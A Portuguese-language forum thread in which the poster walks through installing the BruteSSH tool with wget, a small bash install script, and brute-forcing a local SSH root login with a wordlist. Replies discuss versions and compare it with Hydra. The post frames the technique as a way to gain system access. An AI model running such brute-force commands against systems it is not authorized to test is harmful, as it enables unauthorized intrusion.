Ataque SSH por Bruteforce com BruteSSH

[0fx66]

Introdução
BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1)

Instalando o BruteSSH
Abra o terminal e faça o download do arquivo pelo comandos a seguir:

Código HTML:

root@bt:~# wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2

Agora vamos decompactar o arquivo:

Código HTML:

root@bt:~# tar -jxvf brutessh-0.5.tar.bz2

Depois basta entrar no diretório

Código HTML:

root@bt:~# cd brutessh
root@bt:~/brutessh#

Agora é só rodar o script feito em python (py):

Código HTML:

root@bt:~/brutessh# python brutessh.py

Se você observar, os parâmetros são bem simples. Vamos lá mostrar alguns.

Código HTML:

-h: Host destino
-u: Usuário
-d: Arquivo de senha

Ps: Criei um script capaz de instalar o BruteSSH automaticamente.

Código HTML:

#!/bin/bash
# Por Jarlley Ribeiro - 0fx66


clear
echo "  [        Brute install                  ]"
echo "  [       0fx66 - www.0fx66.blogspot.com  ]"
echo ""
echo " [*]  Downloadind BruteSSH. Please Wait..."
wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2 1> /dev/null 2> /dev/stdout
echo " [*]  Unpacking Brutessh. Please Wait..."
tar -jxvf brutessh-0.5.tar.bz2 1> /dev/null 2> /dev/stdout
echo " [*]  OK!"
echo " [*]  To run, use: python brutessh.py"
echo "  Exiting.."

Agora basta você da as permissões necessárias (x = execução) para executar o script.

Código HTML:

root@bt:~/aaa# chmod +x brutessh_Install.sh

Ataque!
Uso o serviço SSH do BackTrack com login e senha padrão (root e toor), então vou criar uma pequena world list com a senha correspondente.



Agora vamos disparar o ataque usando a seguinte sintaxe:

Código HTML:

root@bt:~/brutessh# python brutessh.py -h 127.0.0.1 -u root -d password

Onde os parâmetros foram explicados acima. O resultado foi:



No campo "Password Found", ele exibe a senha quebrada (toor).

Finalizando
Com uma ótima word list e paciência, você pode rapidamente conseguir acesso ao sistema por ssh, para se proteger, evite usar senhas de fáceis caracteres (toor, 123, 321) e mude sua senha regulamente.

Autor: 0fx66

[Cash Override]

Testando ....

[CoderSc]

Show de bola, tudo muito bem explicado =)

Também irei testar ele aqui, obrigado pela Contribuição

[areax]

Mastigado isso ae, bem últil.

[M4CK]

Faça uma verificação das versões mais novas disponíveis no site.
Seu script não verifica e instala a versão 0.5 onde ja está disponível a versão 0.6.
http://www.edge-security.com/brutessh.php

[]'s

[eduardu0]

Alguém já realizou testes?

Tem performance melhor do que hydra ou medua?

[0fx66]

@eduardu0. O problema desse script é que você tem que ter o usuário já definido e só aceita um tipo de serviço (SSH). No Hydra, você tem a opção de usa uma world list para o Usuário e outra para a Senha e aceita diversos tipos de serviços.

[eduardu0]

@eduardu0. O problema desse script é que você tem que ter o usuário já definido e só aceita um tipo de serviço (SSH). No Hydra, você tem a opção de usa uma world list para o Usuário e outra para a Senha e aceita diversos tipos de serviços.

Realmente uma pena, vou continuar então com as outras opções. Mas não deixa de ser mais uma opção caso alguém esteja com dificuldade de usar os outros softwares de bf.